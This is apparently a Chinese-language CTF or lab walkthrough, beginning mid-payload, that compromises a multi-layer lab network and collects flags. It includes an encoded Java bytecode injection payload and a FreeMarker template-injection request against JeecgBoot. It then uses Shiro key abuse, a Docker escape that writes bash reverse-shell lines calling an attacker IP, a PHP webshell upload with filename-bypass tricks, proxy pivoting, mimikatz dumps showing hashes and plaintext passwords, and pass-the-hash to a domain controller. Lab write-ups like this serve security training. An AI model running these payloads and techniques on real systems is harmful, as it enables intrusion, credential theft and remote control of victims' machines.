IQAFBwDIBwEtBwEvBwExBwDIAAD8ABcBAAsAAAAEAAEADQAIAGcAWQACAAcAAABXAAIAAwAAABEqK7gBTE0sBLYBTywqtgFQsAAAAAIAGQAAAA4AAwAAAKYABgCnAAsAqAAaAAAAIAADAAAAEQFFABwAAAAAABEBRgEEAAEABgALAUcBSAACAAsAAAAEAAEAGAAIAUkBSgACAAcAAADHAAMABAAAACgqtgB6TSzGABksK7YBV04tBLYBTy2wTiy2AVpNp//puwFSWSu3AVu/AAEACQAVABYBUgAEABkAAAAmAAkAAACsAAUArQAJAK8ADwCwABQAsQAWALIAFwCzABwAtAAfALYAGgAAADQABQAPAAcBRwFIAAMAFwAFAEoBUwADAAAAKAFFABwAAAAAACgBRgEEAAEABQAjAKcAqAACACIAAAAMAAEABQAjAKcBEAACACgAAAANAAP8AAUHAHxQBwFSCAALAAAABAABAVIAKABYAFkAAgAHAAAAQgAEAAIAAAAOKisDvQB8A70ABLgA7bAAAAACABkAAAAGAAEAAAC6ABoAAAAWAAIAAAAOAVwAHAAAAAAADgFdAQQAAQALAAAACAADAJwAmgCeACkAWADrAAIABwAAAhcAAwAJAAAAyirBAHyZAAoqwAB8pwAHKrYAejoEAToFGQQ6BhkFxwBkGQbGAF8sxwBDGQa2AWs6BwM2CBUIGQe+ogAuGQcVCDK2AWwrtgFvmQAZGQcVCDK2AXO+mgANGQcVCDI6BacACYQIAaf/0KcADBkGKyy2ANE6Baf/qToHGQa2AVo6Bqf/nRkFxwAMuwCcWSu3AXS/GQUEtgDXKsEAfJkAGhkFAS22AN+wOge7AJVZGQe2AXe3AXi/GQUqLbYA37A6B7sAlVkZB7YBd7cBeL8AAwAlAHIAdQCcAJwAowCkAJoAswC6ALsAmgADABkAAABuABsAAAC+ABQAvwAXAMEAGwDCACUAxAApAMYAMADHADsAyABWAMkAXQDKAGAAxwBmAM0AaQDOAHIA0gB1ANAAdwDRAH4A0gCBANQAhgDVAI8A1wCVANgAnADaAKQA2wCmANwAswDgALsA4QC9AOIAGgAAAHoADAAzADMBAQECAAgAMAA2AV4BXwAHAHcABwBKAWAABwCmAA0ASgFhAAcAvQANAEoBYQAHAAAAygFFABwAAAAAAMoBXQEEAAEAAADKAWIBYwACAAAAygFkAOEAAwAUALYApwCoAAQAFwCzAWUApgAFABsArwFmAKgABgAoAAAALwAODkMHAHz+AAgHAHwHANMHAHz9ABcHAWcBLPkABQIIQgcAnAsNVAcAmg5HBwCaAAsAAAAIAAMAnACeAJoACAF5ABYAAQAHAAAAJQACAAAAAAAJuwACWbcBelexAAAAAQAZAAAACgACAAAAIQAIACIAAA==';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
|
http://192.168.111.22:18088/jeecg-boot/jmreport/queryFieldBySql
密码:test
请求头:User-Agent: Bhimaw
loadTableData SSTI模板注入
1
2
3
4
5
6
7
8
9
| POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
Content-Type: application/json; charset=utf-8
Content-Length: 165
Host: 192.168.111.22:18088
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}
|
http://192.168.111.22:18080/
在路径/home/ubuntu/doctool.jar找到源码,下载反编译一下
/doctool.jar!/BOOT-INF/classes/com/example/doctoolkit/shiro/ShiroConfig.class
找到 shiro 密钥QZIysgMYhG7/CzIJlVpR1g==
GitHub - SummerSec/ShiroAttack2: shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack
Docker 逃逸
发现当前在 docker 环境中
cat /proc/1/cgroup
ls -la /.dockerenv
df -h
嘶 怎么个事 再看看 shiro 环境
路径:http://192.168.111.22:18080/test
密码:pass1024
发现存在挂载,挂载的是宿主机的目录
这里有个flag{nItAM4shIzhenN1ubi}
挂载进行定时任务逃逸
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| # 1. 进入宿主机tmp目录
cd /dev/tmp/tmp
# 2. 创建test.sh 并写入内容
cat > test.sh <<
#!/bin/bash
bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
EOF
# 3. 赋予可执行权限
chmod +x test.sh
# 4. 定时任务反弹shell
sed -i
|
nc -lv 7777
第一层内网
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
| root@wty-virtual-machine:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b1:3a:e7 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.111.22/24 brd 192.168.111.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:3ae7/64 scope link
valid_lft forever preferred_lft forever
3: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b1:62:bf brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.80.50/24 brd 192.168.80.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:62bf/64 scope link
valid_lft forever preferred_lft forever
4: br-2ed9e624a55e: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:86:33:b1:e6 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.1/16 brd 172.20.255.255 scope global br-2ed9e624a55e
valid_lft forever preferred_lft forever
inet6 fe80::42:86ff:fe33:b1e6/64 scope link
valid_lft forever preferred_lft forever
5: br-5c4f24880ae8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:90:1f:d0:a6 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5c4f24880ae8
valid_lft forever preferred_lft forever
6: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:7a:e0:9d:e5 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
7: br-a8cbb2f18fd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:a1:8e:71:2a brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a8cbb2f18fd5
valid_lft forever preferred_lft forever
inet6 fe80::42:a1ff:fe8e:712a/64 scope link
valid_lft forever preferred_lft forever
9: vethb31e178@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
link/ether 2a:fa:8c:44:8f:42 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::28fa:8cff:fe44:8f42/64 scope link
valid_lft forever preferred_lft forever
11: veth330c26c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
link/ether 7a:0a:7e:fa:82:14 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::780a:7eff:fefa:8214/64 scope link
valid_lft forever preferred_lft forever
13: vethea4b282@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
link/ether 46:70:f8:09:e5:9b brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::4470:f8ff:fe09:e59b/64 scope link
valid_lft forever preferred_lft forever
15: veth6409444@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a8cbb2f18fd5 state UP group default
link/ether ea:0d:25:9a:29:33 brd ff:ff:ff:ff:ff:ff link-netnsid 3
inet6 fe80::e80d:25ff:fe9a:2933/64 scope link
valid_lft forever preferred_lft forever
root@wty-virtual-machine:~#
|
上传 linux_x64_agent
GitHub - ph4ntonn/Stowaway: 👻Stowaway – Multi-hop Proxy Tool for pentesters
./linux_x64_agent -c 192.168.111.25:9999 -s pass --reconnect 10
./macos_arm64_admin -l 9999 -s pass
use 0
socks 55667 123 123
socks5://123:123@127.0.0.1:55667
任意文件上传
先看看 web 资产,扫扫目录
phpmyadmin 弱口令 root/root,但是没办法 rce
http://192.168.80.55/web.php
简单的黑名单后缀名绕过
这里简单用空格绕过、点绕过、::$DATA 绕过,其余方式自行尝试 文件上传绕过总结
Content-Disposition: form-data; name="fileToUpload"; filename="1.php."
Content-Disposition: form-data; name="fileToUpload"; filename="2.php "
Content-Disposition: form-data; name="fileToUpload"; filename="3.php::$DATA"
尝试上传木马文件 有一点点敏感函数检测
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| POST /up.php HTTP/1.1
Host: 192.168.80.55
Content-Length: 334
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.80.55
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarychBkiANjERe4CNu8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.80.55/web.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarychBkiANjERe4CNu8
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php."
Content-Type: image/jpeg
<?php
assert($_REQUEST['pass']);
?>
------WebKitFormBoundarychBkiANjERe4CNu8
Content-Disposition: form-data; name="submit"
上传文件
------WebKitFormBoundarychBkiANjERe4CNu8--
|
http://192.168.80.55/uploads/shell.php 密码 pass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| C:/phpStudy/PHPTutorial/WWW/uploads/ >whoami
win-p5vv23d2i7p\administrator
C:/phpStudy/PHPTutorial/WWW/uploads/ >ipconfig
Windows IP ����
��̫�������� �������� 2:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::f05b:eab:519:6cc7%13
IPv4 ��ַ . . . . . . . . . . . . : 192.168.81.22
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.81.1
��̫�������� ��������:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::640d:66de:35a6:2e7%10
IPv4 ��ַ . . . . . . . . . . . . : 192.168.80.55
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.80.1
��������� isatap.{81F64077-4CE3-4ED0-B8A3-22124C91CB3A}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
��������� isatap.{038DAB72-5539-4785-BFF0-5DA18E9CFFEE}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
C:/phpStudy/PHPTutorial/WWW/uploads/ >
|
查看进程tasklist /SVC发现有个火绒
在桌面找到第二个 C:/Users/Administrator/Desktop/flag.txt
flag{8ASDE242NFSDJH83KSAIB3}
第二层内网
上传windows_x64_agent.exe 拉个代理出来
listen
192.168.80.50:9999
windows_x64_agent.exe -c 192.168.80.50:9999 -s pass --reconnect 10
back
use 1
socks 55668 123 123
扫一下网段192.168.81.1/24
socks5://123:123@127.0.0.1:55668
主机有点多,简单扫扫
Weblogic
http://192.168.81.20:7001/console/login/LoginForm.jsp
直接挂上代理一把梭
GitHub - KimJun1010/WeblogicTool: WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)
http://192.168.81.20:7001/bea_wls_internal/test 密码:pass 秘钥:key
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >systeminfo
������: WEBLOGIC
OS ����: Microsoft Windows Server 2012 R2 Datacenter
OS �汾: 6.3.9600 ��ȱ Build 9600
OS ������: Microsoft Corporation
OS ����: ��Ա������
OS ��������: Multiprocessor Free
ע���������: Windows �û�
ע�����֯:
��Ʒ ID: 00253-40020-11623-AA092
��ʼ��װ����: 2021/11/5, 16:39:33
ϵͳ����ʱ��: 2025/10/31, 14:37:51
ϵͳ������: VMware, Inc.
ϵͳ�ͺ�: VMware Virtual Platform
ϵͳ����: x64-based PC
������: ��װ�� 2 ����������
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
[02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
BIOS �汾: Phoenix Technologies LTD 6.00, 2020/11/12
Windows Ŀ¼: C:\Windows
ϵͳĿ¼: C:\Windows\system32
�����豸: \Device\HarddiskVolume1
ϵͳ��������: zh-cn;����(�й�)
���뷨��������: zh-cn;����(�й�)
ʱ��: (UTC+08:00)���������죬����ر�����������³ľ��
�����ڴ�����: 2,047 MB
���õ������ڴ�: 1,261 MB
�����ڴ�: ���ֵ: 2,431 MB
�����ڴ�: ����: 1,151 MB
�����ڴ�: ʹ����: 1,280 MB
ҳ���ļ�λ��: C:\pagefile.sys
��: c3ting.org
��¼������: ��ȱ
������: ��װ�� 3 ��������
[01]: KB2919355
[02]: KB2919442
[03]: KB2999226
����: ��װ�� 2 �� NIC��
[01]: Intel(R) 82574L ǧ����������
������: Ethernet0
���� DHCP: ��
IP ��ַ
[01]: 192.168.81.20
[02]: fe80::e030:2714:368e:63a7
[02]: Intel(R) 82574L ǧ����������
������: Ethernet1
���� DHCP: ��
IP ��ַ
[01]: 192.168.77.25
[02]: fe80::5049:5fe3:1f5b:9c9c
Hyper-V Ҫ��: �Ѽ��������س�������ʾ Hyper-V ����Ĺ��ܡ�
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >nslookup c3ting.org
DNS request timed out.
timeout was 2 seconds.
������: UnKnown
Address: 192.168.77.250
����: c3ting.org
Address: 192.168.77.250
C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >nltest /dsgetdc:c3ting.org
DC: \\WIN-LAVRSND6J6N.c3ting.org
��ַ: \\192.168.77.250
Dom Guid: ad7512fa-8407-479c-beae-66f83264f83d
Dom ����: c3ting.org
������: c3ting.org
DC վ������: Default-First-Site-Name
���ǵ�վ������: Default-First-Site-Name
��־: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9
������ɹ����
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| :/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >ipconfig
Windows IP ����
��̫�������� Ethernet1:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::5049:5fe3:1f5b:9c9c%14
IPv4 ��ַ . . . . . . . . . . . . : 192.168.77.25
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.77.1
��̫�������� Ethernet0:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::e030:2714:368e:63a7%12
IPv4 ��ַ . . . . . . . . . . . . : 192.168.81.20
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.81.1
��������� isatap.{8F6412DB-D757-413C-97E1-76F7DB61BD9C}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
��������� isatap.{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ > cmdkey /list
��ǰ�����ƾ��:
Ŀ��: LegacyGeneric:target=C3TING\Administrator
����: ��ͨ
�û�: C3TING\Administrator
Ŀ��: LegacyGeneric:target=WEBLOGIC\Administrator
����: ��ͨ
�û�: WEBLOGIC\Administrator
|
综合一下获取到的信息
系统信息:
主机名:WEBLOGIC
操作系统:Windows Server 2012 R2 Datacenter
系统架构:x64
内存:2GB
域:c3ting.org
域控:WIN-LAVRSND6J6N.c3ting.org (IP: 192.168.77.250)
网络配置:
两个网卡:Ethernet0 (192.168.81.20) 和 Ethernet1 (192.168.77.25)
域控IP:192.168.77.250,与Ethernet1在同一网段
凭据信息:
保存的凭据包括域管理员(C3TING\Administrator)和本地管理员(WEBLOGIC\Administrator)
第三层内网
上传windows_x64_agent.exe 拉个代理出来
listen
192.168.81.22:9999
windows_x64_agent.exe -c 192.168.81.22:9999 -s pass --reconnect 10
back
use 2
socks 55669 123 123
socks5://123:123@127.0.0.1:55669
上传 mimikatz 抓取 hash
GitHub - ParrotSec/mimikatz
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > 1.txt 2>&1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
|
.
.
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline)
Privilege '20' OK
mimikatz(commandline)
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
432 {0;000003e7} 0 D 45358 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
-> Impersonated !
* Process Token : {0;0001de16} 0 D 1778918 C3TING\Administrator S-1-5-21-495363149-4124706654-1579529781-500 (17g,23p) Primary
* Thread Token : {0;000003e7} 0 D 1790230 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
mimikatz(commandline)
Authentication Id : 0 ; 122390 (00000000:0001de16)
Session : Batch from 0
User Name : Administrator
Domain : C3TING
Logon Server : WIN-1SJG2BFF54E
Logon Time : 2025/10/31 14:38:38
SID : S-1-5-21-495363149-4124706654-1579529781-500
msv :
[00010000] CredentialKeys
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
[00000003] Primary
* Username : Administrator
* Domain : C3TING
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
tspkg :
wdigest :
* Username : Administrator
* Domain : C3TING
* Password : (null)
kerberos :
* Username : Administrator
* Domain : C3TING.ORG
* Password : C3ting!@
ssp : KO
credman :
[00000000]
* Username : C3TING\Administrator
* Domain : C3TING\Administrator
* Password : C3ting!@
[00000001]
* Username : WEBLOGIC\Administrator
* Domain : WEBLOGIC\Administrator
* Password : C3ting!@
Authentication Id : 0 ; 82000 (00000000:00014050)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/10/31 14:38:34
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : WEBLOGIC$
* Domain : c3ting.org
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :
Authentication Id : 0 ; 81982 (00000000:0001403e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/10/31 14:38:34
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : WEBLOGIC$
* Domain : c3ting.org
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEBLOGIC$
Domain : C3TING
Logon Server : (null)
Logon Time : 2025/10/31 14:38:33
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : weblogic$
* Domain : c3ting.org
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/10/31 14:38:34
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 50093 (00000000:0000c3ad)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/10/31 14:38:21
SID :
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
kerberos :
ssp : KO
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEBLOGIC$
Domain : C3TING
Logon Server : (null)
Logon Time : 2025/10/31 14:38:20
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : weblogic$
* Domain : C3TING.ORG
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :
mimikatz(commandline)
Bye!
|
PTH 横向
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
vi /etc/proxychains4.conf
socks5 10.37.129.2 55669 123 123
proxychains4 impacket-psexec -hashes :7ab183888ecafcccf897c4a5a59c8568 c3ting.org/administrator@192.168.77.250
最后在桌面拿到 flag
type flag.txt
flag{C3ting&&JACK-ASDIHOEOFAO124124ASDFFOHIAowefqwfwf}